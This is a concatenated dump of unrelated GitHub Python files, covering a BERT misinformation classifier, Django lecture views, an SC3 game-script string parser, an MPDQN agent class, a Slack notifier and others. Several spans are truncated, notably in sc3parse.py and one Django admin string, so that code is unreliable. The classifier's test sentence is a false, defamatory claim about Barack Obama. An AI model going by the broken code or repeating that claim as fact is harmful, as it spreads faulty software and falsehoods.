LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.neural_network import MLPClassifier\nimport tensorflow as tf\nfrom keras import layers\nimport numpy as np\nimport transformers\nimport torch\n\n# Load pre-trained model\nmodel_, tokenizer_, pretrained_weights = (transformers.BertModel, transformers.BertTokenizer, 'bert-base-cased')\ntokenizer = tokenizer_.from_pretrained(pretrained_weights)\nmodel = model_.from_pretrained(pretrained_weights)\n\n# Read the CSV for article information and text\narticles = pd.read_csv(\"Data for Misinformation - Sheet1.csv\")\n\n# Tokenize text\ntokenized = articles['Article Title'].apply((lambda x: tokenizer.encode(x[-512:], add_special_tokens=True)))\n\n# Padding so equal length\nmax_len = 0\nfor i in tokenized.values:\n if len(i) > max_len:\n max_len = len(i)\npadded = np.array([i + [0] * (max_len - len(i)) for i in tokenized.values])\nattention_mask = np.where(padded != 0, 1, 0)\n\n# Train model\ninput_ids = torch.tensor(np.array(padded, dtype=np.float64)).to(torch.int64)\nattention_mask = torch.tensor(np.array(attention_mask, dtype=np.float64)).to(torch.int64)\nwith torch.no_grad():\n last_hidden_states = model(input_ids, attention_mask=attention_mask)\n\n# Output features\nfeatures = np.array(last_hidden_states[0][:, 0, :])\n\n# Reformat the text to get rid of unnecessary characters\n# def fix_text(x):\n# list_corpus = x.strip(\".\").strip(\",\").strip(\"[\").strip(\"]\").strip(\";\").strip(\":\").split(\" \")\n# return model.infer_vector(list_corpus)\n\n\n# Create a list of vectors with their text fixed\n# vector = []\n# for art in range(article_text.shape[0]):\n# vector.append(fix_text(article_text[art]))\n\n\n# Create new file with vectors (NOT NEEDED ANYMORE)\n# def g(x):\n# dict_ = {True: 1, False: 0}\n# return dict_[x]\n# articles['Veracity Int'] = articles['Veracity'].apply(lambda x: g(x))\n#\n# articles['Vector'] = articles['Article Text'].apply(lambda x: fix_text(x))\n#\n# articles.to_csv(\"Model Input.csv\", index=False)\n\n\n# Read new file and create variables based on the inputs and outputs of the neural network\narticles = pd.read_csv(\"Model Input.csv\")\nX = features\ny = articles['Veracity Int']\n\n\n# Train test split the data\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n# Reformat all data into NumPy arrays\nX_train = np.array(X_train)\nX_test = np.array(X_test)\ny_train = np.array(y_train)\ny_test = np.array(y_test)\n\n\n# Create the sklearn classifier and train it (OBSOLETE)\n# clf = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(5, 2), random_state=1)\n# clf.fit(X_train, y_train)\n\n\n# Define the model constants\nmax_features = 20000\nembedding_dim = 128\nsequence_length = 500\n\n\n\n# Create the model\nmisinfo = keras.models.Sequential()\nmisinfo.add(keras.layers.Flatten(input_shape=[768,])) # X_train has 40 features\nmisinfo.add(keras.layers.Dense(300, activation='relu'))\nmisinfo.add(keras.layers.Dense(100, activation='relu'))\nmisinfo.add(keras.layers.Dense(1, activation='sigmoid'))\n\n# Compile the model\nmisinfo.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n\n# Train the model\nepochs = 30\n\nmisinfo.fit(X_train, y_train, epochs=epochs)\n\n\n# Test the model's accuracy\nmisinfo.evaluate(X_test, y_test)\n\n# Input your own statement\n\n_tokenizer_ = tokenizer.encode(\"Donald Trump is BEST president ever and Barack Obama is a muslim terrorist\",\n add_special_tokens=True)\n_padded = np.array(_tokenizer_ + [0] * (max_len - len(_tokenizer_)))\n_attention_mask = np.where(_padded != 0, 1, 0)\n\n# Train model\n_input_ids = torch.tensor(np.array(_padded, dtype=np.float64)).to(torch.int64).unsqueeze(0)\n_attention_mask = torch.tensor(np.array(_attention_mask, dtype=np.float64)).to(torch.int64).unsqueeze(0)\nwith torch.no_grad():\n last_hidden_states_ = model(_input_ids, attention_mask=_attention_mask)\nstatement = np.array(last_hidden_states_[0][:, 0, :])\n\nprint(misinfo.predict(statement))\n","repo_name":"MasterOfTartarus/FactOrMisinfo","sub_path":"newtextvectorization.py","file_name":"newtextvectorization.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18111461932","text":"import os\n\nfrom processing_stages.run_facemorpher import run_facemorpher\nfrom processing_stages.scramble_picture import scramble_picture\nfrom processing_stages.validate_dirs_and_get_paths import \\\n validate_dirs_and_get_paths\nfrom processing_stages.working_paths import WorkingPaths\n\n\ndef morphify(input_dir: str,\n stranger_dir: str,\n output_dir: str) -> WorkingPaths:\n \"\"\"\n Makes a morphing pictures for\n I/Friend/Stranger photos in different mood types.\n \"\"\"\n working_paths = validate_dirs_and_get_paths(input_dir,\n stranger_dir,\n output_dir)\n run_facemorpher(working_paths)\n for morphing_frames in working_paths.output_paths.values():\n # Scramble every middle frame of mood-opposite frames.\n middle_frame_index = len(morphing_frames) // 2\n middle_frame_path = morphing_frames[middle_frame_index]\n scrambled_middle_frame_path = scramble_picture(middle_frame_path)\n\n # Original frame should be removed.\n morphing_frames.remove(middle_frame_path)\n morphing_frames.insert(middle_frame_index, scrambled_middle_frame_path)\n os.remove(middle_frame_path)\n\n return working_paths\n","repo_name":"Evgenius2020/morpher","sub_path":"src/morphify.py","file_name":"morphify.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13480879894","text":"from django.shortcuts import render\n\nfrom lecture.models import Lecture\n\nfrom lecture.forms import EditForm\nfrom lecture.forms2 import LectureForm\n\n\n# Create your views here.\ndef detail_lecture(request, *args, **kwargs):\n if request.method == 'GET':\n lecture = Lecture.objects.get(id=kwargs['lecture_id'])\n return render(request, 'detail_lecture.html', locals())\n\n\ndef create_lecture(request):\n if request.method == 'POST':\n form = LectureForm(request.POST)\n if form.is_valid():\n form.save()\n form = LectureForm()\n return render(request, 'create_course.html', locals())\n\n\ndef edit_lecture(request, *args, **kwargs):\n lecture_id = kwargs['lecture_id']\n if request.method == 'POST':\n form = EditForm(request.POST)\n if form.is_valid():\n form.save(lecture_id)\n form = EditForm()\n return render(request, 'edit_lecture.html', locals())\n","repo_name":"nikolaystanishev/HackBulgaria_Python101","sub_path":"cms/lecture/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"889116322","text":"import numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt \n# img = np.zeros((256,256,3),np.uint8)\n\n# img[100,100] = (0,0,255)\n# px = img[100,100]\n# # print(px)\n# # cv.imshow(\"image\",img)\n# # cv.waitKey(0)\n# print(img.shape)\n# print(img.dtype)\n# print(img.size)\nimg = cv.imread(\"C/Users/12925/Desktop/cv/images/02.jpg\")\nb,g,r = cv.split(img)\nimg2 = cv.merge((b,g,r))\ngray = cv.cvtColor(img,cv.COLOR_BGR2GRAY)\nhsv = cv.cvtColor(img,cv.COLOR_BGR2HSV)\ncv.imshow(\"img1\",img)\ncv.imshow(\"img\",hsv)\ncv.waitKey(0)","repo_name":"1292534569/Digital-Image-Processing","sub_path":"opencv_opration/test03.py","file_name":"test03.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22970624175","text":"\"\"\" sc3parse.py\nRecover the contents of string tables from SC3 files. Perhaps at some point \ndown the road, we'll deal with more aspects of the actual bytecode, if that \nends up being necessary.\n\n# Example usage\nThe sc3() container parses up a file. For looking through strings that have\nbeen mapped onto some character set, the usage should probably look something \nlike this:\n\n```\n #!/usr/bin/python3\n from sc3parse import *\n from my_charset import my_utf_charset\n\n my_script = sc3(my_file.sc3, my_uft_charset)\n\n for string in my_script.strings:\n for token in string:\n # Do something interesting\n # ...\n```\n\"\"\"\n\nfrom struct import pack, unpack\nfrom enum import Enum\n\nclass cmd(Enum):\n \"\"\" Command token types \"\"\"\n LINE_BREAK = 0x00\n CHARACTER_NAME = 0x01\n DIALOGUE_START = 0x02\n PRESENT_03 = 0x03\n SET_COLOR = 0x04\n UNK_05 = 0x05\n PRESENT_RESETALIGN = 0x08\n RUBY_BASE_START = 0x09\n RUBY_TEXT_START = 0x0a\n RUBY_TEXT_END = 0x0b\n SET_FONT_SIZE = 0x0c\n PRINT_PARALLEL = 0x0e\n CENTER_TEXT = 0x0f\n SET_TOP_MARGIN = 0x11\n SET_LEFT_MARGIN = 0x12\n GET_HARDCODED_VALUE = 0x13\n EVAL_EXPRESSION = 0x15\n PRESENT_18 = 0x18\n AUTO_FORWARD = 0x19\n AUTO_FORWARD_1A = 0x1a\n UNK_1E = 0x1e\n LINE_BREAK_ALT = 0x1f\n\n\n\"\"\" \nTable of geometry for commands. 'None' indicates a variable-length command, \nwhich might require more parsing to determine the actual length.\n\"\"\"\ncommand_table = { \n cmd.LINE_BREAK: { 'type': 0x00, 'len': 1 },\n cmd.CHARACTER_NAME: { 'type': 0x01, 'len': 1 },\n cmd.DIALOGUE_START: { 'type': 0x02, 'len': 1 },\n cmd.PRESENT_03: { 'type': 0x03, 'len': 1 },\n cmd.SET_COLOR: { 'type': 0x04, 'len': None },\n cmd.UNK_05: { 'type': 0x05, 'len': 1 },\n cmd.PRESENT_RESETALIGN: { 'type': 0x08, 'len': 1 },\n cmd.RUBY_BASE_START: { 'type': 0x09, 'len': 1 },\n cmd.RUBY_TEXT_START: { 'type': 0x0a, 'len': 1 },\n cmd.RUBY_TEXT_END: { 'type': 0x0b, 'len': 1 },\n cmd.SET_FONT_SIZE: { 'type': 0x0c, 'len': 3 },\n cmd.PRINT_PARALLEL: { 'type': 0x0e, 'len': 1 },\n cmd.CENTER_TEXT: { 'type': 0x0f, 'len': 1 },\n cmd.SET_TOP_MARGIN: { 'type': 0x11, 'len': 3 },\n cmd.SET_LEFT_MARGIN: { 'type': 0x12, 'len': 3 },\n cmd.GET_HARDCODED_VALUE: { 'type': 0x13, 'len': 3 },\n cmd.EVAL_EXPRESSION: { 'type': 0x15, 'len': None },\n cmd.PRESENT_18: { 'type': 0x18, 'len': 1 },\n cmd.AUTO_FORWARD: { 'type': 0x19, 'len': 1 },\n cmd.AUTO_FORWARD_1A: { 'type': 0x1a, 'len': 1 },\n cmd.UNK_1E: { 'type': 0x1e, 'len': 1 },\n cmd.LINE_BREAK_ALT: { 'type': 0x1f, 'len': 1 },\n}\n\n\n\nclass sc3(object):\n \"\"\" An object representing a particular SC3 file.\n We are really only interested in parsing the string table atm. Strings are\n composed of \"tokens,\" which may be *characters* or *commands*. Character \n tokens are offsets into some game-specific character set which may not\n correspond [in any consistent, rigorous way] with encodings like UTF.\n\n The constructor takes two arguments:\n - 'filename', the name of some target SC3 file\n - 'charset', an array of characters used to map character tokens\n onto actual UTF characters. \n \"\"\"\n\n def __init__(self, filename, charset):\n\n self.charset = charset\n\n # Read the contents of the user-provided file\n with open(filename, \"rb\") as f:\n self.data = f.read()\n\n # Verify this is actually an SC3 file\n if (self.data[0x00:0x04] != b'SC3\\x00'):\n print(\"[!] {} is not an SC3 file\".format(filename))\n exit(-1)\n\n # Obtain offsets to various tables\n self.s_table = unpack(\" 0):\n cur += 1\n\n # All expression tokens end with a \"precedence\" byte\n precedence = self.data[cur]\n cur += 1\n\n return cur - expr_base\n\n\n def parse_strings(self):\n \"\"\" Populate self.strings with an array of string representations.\n Strings are composed of dictionary objects of the form:\n\n {\n 'type': , \n 'data': \n }\n \"\"\"\n # Start at the base of the string table\n string_cur = self.s_table\n num_entries = self.s_table_entries\n\n self.strings = []\n for i in range(0, num_entries):\n\n # Obtain an offset to some string in the file\n string_base = unpack(\"= 0x80):\n char = unpack(\">H\", self.data[cur:cur+2])[0]\n char_idx = char - 0x8000\n\n token['type'] = 'CHR'\n if (char_idx < len(self.charset)):\n token['data'] = self.charset[char_idx]\n else:\n token['data'] = '?'\n string.append(token)\n cur += 2\n\n # Handle command tokens\n if (token_type < 0x80):\n command = cmd(token_type)\n token['type'] = 'CMD'\n token['data'] = command\n\n # Parse expressions for variable-length commands\n if (command_table[command]['len'] == None):\n cur += 1\n expr_len = self._parse_expression(cur)\n cur += expr_len\n\n # Otherwise, just look up command size in the table\n else:\n cur += command_table[command]['len']\n\n # Append this token to our representation of the string\n string.append(token)\n\n self.strings.append(string)\n string_cur += 4\n\n","repo_name":"eigenform/vita-re","sub_path":"vntools/sc3parse.py","file_name":"sc3parse.py","file_ext":"py","file_size_in_byte":8079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15545549048","text":"from typing import TYPE_CHECKING, Any, Dict, Optional, Tuple, Type, Union\n\nimport torch as th\n\nfrom hmlf.algorithms.mpdqn.policies import MPDQNPolicy\nfrom hmlf.algorithms.pdqn import PDQN\n\nif TYPE_CHECKING:\n from hmlf.common.type_aliases import GymEnv, Schedule\n\nfrom hmlf.environments.wrap_environment import register_algorithm_for_wrap_environment, wrap_simple_hybrid\n\n\nclass MPDQN(PDQN):\n \"\"\"\n Deep Multi-Pass Parametrized Q-Network (MP-DQN)\n\n Paper: https://arxiv.org/abs/1810.06394\n Default hyperparameters are taken from the DQN-nature paper,\n except for the optimizer and learning rate that were taken from Stable Baselines defaults.\n\n :param policy: The policy model to use (MlpPolicy, CnnPolicy, ...)\n :param env: The environment to learn from (if registered in Gym, can be str)\n :param learning_rate_q: The learning rate for the Q-Network, it can be a function\n of the current progress remaining (from 1 to 0)\n :param learning_rate_parameter: The learning rate for the parameter network, it can be a function\n of the current progress remaining (from 1 to 0)\n :param buffer_size: size of the replay buffer\n :param learning_starts: how many steps of the model to collect transitions for before learning starts\n :param batch_size: Minibatch size for each gradient update\n :param tau: the soft update coefficient (\"Polyak update\", between 0 and 1) default 1 for hard update\n :param gamma: the discount factor\n param train_freq: Update the model every ``train_freq`` steps. Alternatively pass a tuple of frequency and unit\n like ``(5, \"step\")`` or ``(2, \"episode\")``.\n :param gradient_steps: How many gradient steps to do after each rollout (see ``train_freq``)\n Set to ``-1`` means to do as many gradient steps as steps done in the environment\n during the rollout.\n :param optimize_memory_usage: Enable a memory efficient variant of the replay buffer\n at a cost of more complexity.\n See https://github.com/DLR-RM/stable-baselines3/issues/37#issuecomment-637501195\n :param target_update_interval: update the target network every ``target_update_interval``\n environment steps.\n :param exploration_fraction: fraction of entire training period over which the exploration rate is reduced\n :param exploration_initial_eps: initial value of random action probability\n :param exploration_final_eps: final value of random action probability\n :param max_grad_norm: The maximum value for the gradient clipping\n :param tensorboard_log: the log location for tensorboard (if None, no logging)\n :param create_eval_env: Whether to create a second environment that will be\n used for evaluating the agent periodically. (Only available when passing string for the environment)\n :param policy_kwargs: additional arguments to be passed to the policy on creation\n :param verbose: the verbosity level: 0 no output, 1 info, 2 debug\n :param seed: Seed for the pseudo random generators\n :param device: Device (cpu, cuda, ...) on which the code should be run.\n Setting it to auto, the code will be run on the GPU if possible.\n :param _init_setup_model: Whether or not to build the network at the creation of the instance\n \"\"\"\n\n def __init__(\n self,\n policy: Type[MPDQNPolicy],\n env: Union[\"GymEnv\", str],\n learning_rate_q: Union[float, \"Schedule\"] = 1e-4,\n learning_rate_parameter: Union[float, \"Schedule\"] = 1e-4,\n buffer_size: int = 1000000,\n learning_starts: int = 50000,\n batch_size: Optional[int] = 32,\n tau: float = 1.0,\n gamma: float = 0.99,\n train_freq: Union[int, Tuple[int, str]] = 4,\n gradient_steps: int = 1,\n optimize_memory_usage: bool = False,\n target_update_interval: int = 10000,\n exploration_fraction: float = 0.1,\n exploration_initial_eps: float = 1.0,\n exploration_final_eps: float = 0.05,\n max_grad_norm: float = 10,\n tensorboard_log: Optional[str] = None,\n create_eval_env: bool = False,\n policy_kwargs: Optional[Dict[str, Any]] = None,\n verbose: int = 0,\n seed: Optional[int] = None,\n device: Union[th.device, str] = \"auto\",\n _init_setup_model: bool = True,\n ):\n\n super(MPDQN, self).__init__(\n policy=policy,\n env=env,\n learning_rate_q=learning_rate_q,\n learning_rate_parameter=learning_rate_parameter,\n buffer_size=buffer_size,\n learning_starts=learning_starts,\n batch_size=batch_size,\n tau=tau,\n gamma=gamma,\n train_freq=train_freq,\n gradient_steps=gradient_steps,\n optimize_memory_usage=optimize_memory_usage,\n target_update_interval=target_update_interval,\n exploration_fraction=exploration_fraction,\n exploration_initial_eps=exploration_initial_eps,\n exploration_final_eps=exploration_final_eps,\n max_grad_norm=max_grad_norm,\n tensorboard_log=tensorboard_log,\n create_eval_env=create_eval_env,\n policy_kwargs=policy_kwargs,\n verbose=verbose,\n seed=seed,\n device=device,\n _init_setup_model=_init_setup_model,\n )\n\n\nregister_algorithm_for_wrap_environment(MPDQN, wrap_simple_hybrid)\n","repo_name":"lorenzob123/HMLF","sub_path":"hmlf/algorithms/mpdqn/mpdqn.py","file_name":"mpdqn.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"22134997153","text":"from django.contrib import admin\nfrom django.contrib.auth import get_user_model\nfrom adminsortable2.admin import SortableAdminMixin\nfrom .models import Category, SubCategory, Product, ProductImage, LeadSection, Brand, WishList, CompareProduct, ProductReview\nfrom .forms import ProductForm\n\nfrom django.contrib.auth.models import User\nfrom django.utils.html import escape, mark_safe\n\n# Register your models here.\nUser = get_user_model()\n\n\nclass SubCategoryline(admin.StackedInline):\n model = SubCategory\n extra = 1\n exclude = ['slug']\n\n\nclass CategoryAdmin(SortableAdminMixin, admin.ModelAdmin):\n list_display = ('name', 'slug', 'add_subcategory', 'active',)\n search_fields = ('name',)\n list_filter = ('name',)\n exclude = ['slug']\n list_editable = ['active']\n inlines = [SubCategoryline]\n list_per_page = 20\n\n def add_subcategory(self, obj):\n return mark_safe(f'Add SubCategory')\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n id = request.GET.get('category')\n if db_field.name == 'category' and id:\n kwargs[\"queryset\"] = Category.objects.filter(id=int(id))\n return super().formfield_for_foreignkey(db_field, request, **kwargs)\n\n\nadmin.site.register(Category, CategoryAdmin)\n\n\nclass BrandAdmin(admin.ModelAdmin):\n list_display = ('name', 'slug')\n search_fields = ('name',)\n list_filter = ('name',)\n exclude = ['slug']\n list_per_page = 20\n\n\nadmin.site.register(Brand, BrandAdmin)\n\n\nclass ProductImageInline(admin.StackedInline):\n model = ProductImage\n extra = 0\n max_num = 5\n\n\nclass ProductAdmin(admin.ModelAdmin):\n inlines = [ProductImageInline]\n\n form = ProductForm\n list_display = [\"title\", \"category\",\n \"price\", \"active\"]\n search_fields = ('title', 'slug', 'category__name',\n 'active', 'tags__name')\n list_filter = ['category__name', 'active']\n list_editable = ['active', ]\n exclude = ['slug']\n list_per_page = 20\n\n\nadmin.site.register(Product, ProductAdmin)\n\n\nclass LeadSectionAdmin(admin.ModelAdmin):\n list_display = ('id', 'first_lead', 'second_lead', 'third_lead')\n\n def has_add_permission(self, request):\n return False if self.model.objects.count() > 0 else True\n\n list_per_page = 20\n\n\n# Register your models here.\nadmin.site.register(LeadSection, LeadSectionAdmin)\n\n\nclass WishListAdmin(admin.ModelAdmin):\n list_display = ('user', 'product')\n search_fields = ('user__username', 'product__title')\n list_per_page = 20\n\n\nadmin.site.register(WishList, WishListAdmin)\n\n\nclass CompareProductAdmin(admin.ModelAdmin):\n list_display = ('user', 'product')\n search_fields = ('user__username', 'product__title')\n list_per_page = 20\n\n\nadmin.site.register(CompareProduct, CompareProductAdmin)\n\n\nadmin.site.register(ProductReview)\n","repo_name":"MahmudulHassan5809/Ecommerce-Django","sub_path":"ecom/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12225967998","text":"from ast import Return\nfrom PyQt5 import uic,QtWidgets\nfrom PyQt5.QtWidgets import QHBoxLayout, QMessageBox, QPushButton, QTableWidget, QVBoxLayout, QWidget, QSizePolicy\nfrom PyQt5.QtGui import QIcon\nfrom numpy import mean\n\n\nsoma = 0 \n\ndef calculando(): \n primos = []\n campo_1 = int(calcular.spinBox.text())\n campo_2 = int(calcular.spinBox_2.text())\n\n # Verificar se o campo_2 é menos que o campo_1\n if campo_2 < campo_1: \n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Informação:\")\n msgBox.setIcon(msgBox.Information)\n msgBox.setText('O Segundo campo precisa ser maior que o primeiro')\n msgBox.exec()\n return\n\n # Lógica aplicada para calcular os intervalos dos numeros primos\n for i in range(campo_1, campo_2+1):\n qtd_divisores = 0\n for j in range(1, i+1):\n if i % j == 0:\n qtd_divisores +=1\n if qtd_divisores == 2:\n primos.append(i)\n\n # Soma, contagem e média dos números primos\n soma_dos_primos = sum(primos)\n contagem_dos_primos = len(primos)\n avg = mean(primos)\n \n # Impressão na tela dos resultados da consulta\n calcular.label_4.setText(\"Os Números Primos no Intervalo de: \" +str(campo_1) + ' e ' +str(campo_2) +\n ' São :\\n' + str(primos).replace('[','').replace(']',''))\n \n calcular.label_6.setText(\"A quantidade de números primos entre: \" +str(campo_1) + ' e ' +str(campo_2) +\n ' São :\\n' +str(contagem_dos_primos))\n\n calcular.label_7.setText(\"A soma de todos os números primos entre: \" +str(campo_1) + ' e ' +str(campo_2) +\n ' São :\\n' +str(soma_dos_primos))\n\n calcular.label_8.setText(\"A média aritmética dos números primos entre: \" +str(campo_1) + ' e ' +str(campo_2) +\n ' São :\\n' +str(avg).replace('nan','0'))\n\n # Fim da impressão\n\napp=QtWidgets.QApplication([])\ncalcular=uic.loadUi(\"calculadora.ui\")\ncalcular.setWindowIcon(QIcon(\"calc_icon.png\"))\ncalcular.pushButton.clicked.connect(calculando)\ncalcular.setStyleSheet('QPushButton {color: white}')\n\n\ncalcular.show()\napp.exec()","repo_name":"JoanesAraujo/Python-calculadora-interface-numeros-primos","sub_path":"main_calculadora.py","file_name":"main_calculadora.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14617765291","text":"#!/usr/bin/env python\n#coding: UTF-8\n\nimport json\nimport sys\nimport os\n\nimport requests\n\ndef send_slack_msg(message, channel=None, at_users='', botname='slackbot', color='good', blocktext=''):\n \"\"\"Send an audit log to Slack\n\n color can be \"good\", \"warning\", \"danger\" or any hex color code (#AABBCC)\n \"\"\"\n url = os.environ.get('SLACK_NOTIFY_URL', '')\n if not url:\n raise RuntimeError('SLACK_NOTIFY_URL not set')\n channel = channel or os.environ.get('SLACK_NOTIFY_CHANNEL', '')\n if not channel:\n raise RuntimeError('SLACK_NOTIFY_CHANNEL not set')\n\n at_users = at_users or os.environ.get('SLACK_NOTIFY_USERS', '')\n if not at_users:\n raise RuntimeError('SLACK_NOTIFY_USERS not set')\n\n headers = {'Content-Type': 'application/json'}\n msg = ''\n if isinstance(at_users, str):\n at_users = at_users.split(',')\n for u in at_users:\n msg += \"<@{}> \".format(u)\n msg += message\n\n params = {\n 'username': botname,\n 'icon_emoji': ':chicken:',\n 'channel': '#' + channel.strip('#'),\n }\n # See https://api.slack.com/docs/messages/builder for slack message attachments spec\n if blocktext:\n attachments = [{\n 'color': color,\n 'pretext': msg,\n 'text': blocktext,\n }]\n else:\n attachments = [{'text': msg, 'color': color}]\n\n params['attachments'] = attachments\n r = requests.post(url, data=json.dumps(params), headers=headers)\n r.raise_for_status()\n\ndef main():\n import argparse\n ap = argparse.ArgumentParser()\n ap.add_argument('--botname', default='slackbot')\n ap.add_argument('--at', default='')\n ap.add_argument('--color', default='good', choices=('good', 'bad'))\n ap.add_argument('channel')\n ap.add_argument('msg')\n\n args = ap.parse_args()\n\n assert all([' ' not in s for s in (args.channel, args.botname, args.at)])\n\n send_slack_msg(args.msg, args.channel, at_users=args.at.split(',') if args.at else [], botname=args.botname, color=args.color)\n\nif __name__ == '__main__':\n main()\n","repo_name":"haiwen/seafile-release-tools","sub_path":"android/utils/slack_notify.py","file_name":"slack_notify.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5358018642","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Dec 28 13:16:07 2018\r\n\r\n@author: sevgi\r\n\"\"\"\r\n\r\ndictionary={\"it\",\"was\",\"the\",\"best\",\"of\",\"times\",\"you\",\"can\",\r\n \"add\",\"new\",\"words\",\"here\",\"are\"} \r\n\r\ndef isValid(string):\r\n #if length is 0 return false\r\n if(len(string)==0):\r\n return False;\r\n s2=\"\";\r\n for i in range(len(string)+1):\r\n #s2 is a word ,delete s2 and add the next letter into it\r\n if(s2 in dictionary):\r\n if(i!=len(string)):\r\n s2=string[i].lower()\r\n else:\r\n s2=\"\"#if the func reach the end of string ,add nothing\r\n else:#s2 is not a word, concatanete s2 with the next letter\r\n if(i!=len(string)):\r\n s2=s2+string[i].lower()\r\n if(s2==\"\"):\r\n return True\r\n else:\r\n return False\r\n\r\n#given string\r\nprint(isValid(\"itwasthebestoftimes\"))\r\nprint(isValid(\"youarethebest\"))\r\nprint(isValid(\"besttimesks\"))","repo_name":"sevgibayansalduzz/Algorithm-Design-and-Analysis","sub_path":"hw4/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31794816847","text":"\"\"\"empty message\n\nRevision ID: 0d8d5a59f530\nRevises: \nCreate Date: 2017-02-05 22:20:09.563791\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0d8d5a59f530'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('fornavn', sa.String(length=250), nullable=True),\n sa.Column('efternavn', sa.String(length=250), nullable=True),\n sa.Column('tlf_nr', sa.String(length=10), nullable=True),\n sa.Column('email', sa.String(length=50), nullable=True),\n sa.Column('password', sa.LargeBinary(length=128), nullable=False),\n sa.Column('email_confirmed', sa.Boolean(), nullable=True),\n sa.Column('tlf_nr_confirmed', sa.Boolean(), nullable=True),\n sa.Column('created_on', sa.DateTime(), nullable=True),\n sa.Column('last_modified', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n sa.UniqueConstraint('tlf_nr')\n )\n op.create_table('morgenmad',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('dato', sa.Date(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('dato')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('morgenmad')\n op.drop_table('user')\n # ### end Alembic commands ###\n","repo_name":"andersbogsnes/morgenmad","sub_path":"morgenmad/migrations/versions/0d8d5a59f530_.py","file_name":"0d8d5a59f530_.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12963700492","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.figure( figsize=(16,5) )\ndata1 = np.loadtxt('data1.dat')\ndata2 = np.loadtxt('data2.dat')\n\nplt.subplot(1,2,1)\nplt.title('Método de Euler')\nplt.plot(data1[:,0],data1[:,1],label='velocidad')\nplt.plot(data1[:,0],data1[:,2],label='posición')\nplt.xlabel('t')\nplt.legend()\nplt.subplot(1,2,2)\nplt.title('Método Runge-Kutta')\nplt.plot(data2[:,0],data2[:,1],label='velocidad')\nplt.plot(data2[:,0],data2[:,2],label='posición')\nplt.xlabel('t')\nplt.legend()\nplt.savefig('punto5.png')\n\nplt.figure()\nplt.subplot(1,2,1)\nplt.plot(data1[:,1],data1[:,2], label='Euler')\nplt.legend()\nplt.xlabel('v')\nplt.ylabel('x')\nplt.subplot(1,2,2)\nplt.plot(data2[:,1],data2[:,2], label='RK4')\nplt.legend()\nplt.xlabel('v')\nplt.ylabel('x')\nplt.savefig('punto6.png')\n\ndata81 = np.loadtxt('data81.dat')\ndata82 = np.loadtxt('data82.dat')\ndata83 = np.loadtxt('data83.dat')\ndata84 = np.loadtxt('data84.dat')\n\nplt.figure()\ngam = [0.1, 0.5, 0.7, 0.9]\ndatos = [data81, data82, data83, data84]\nfor i in range(4):\n\tplt.subplot(2,2,i+1)\n\tplt.plot(datos[i][:,1],datos[i][:,2], label='$\\gamma$ ='+str(gam[i]))\n\tplt.legend()\nplt.savefig('punto8_fase.png')\nplt.figure()\nfor i in range(4):\n\tplt.subplot(2,2,i+1)\n\tplt.plot(datos[i][:,0],datos[i][:,1], label='Velocidad, $\\gamma$ ='+str(gam[i]))\n\tplt.plot(datos[i][:,0],datos[i][:,2], label='Posicion, $\\gamma$ ='+str(gam[i]))\n\tplt.legend()\nplt.savefig('punto8_XvsV.png')\n","repo_name":"metodos-computacionales-1/ejercicio-14-segunda-parte-gaboandres1","sub_path":"graficar.py","file_name":"graficar.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29400956146","text":"#! /usr/bin/env python\nimport context\nimport argparse\nimport sys\nimport os\nimport numpy as np\n\nfrom prior_networks.ensembles.ensembles import get_ensemble_predictions\nfrom prior_networks.ensembles.uncertainties import ensemble_uncertainties\nfrom 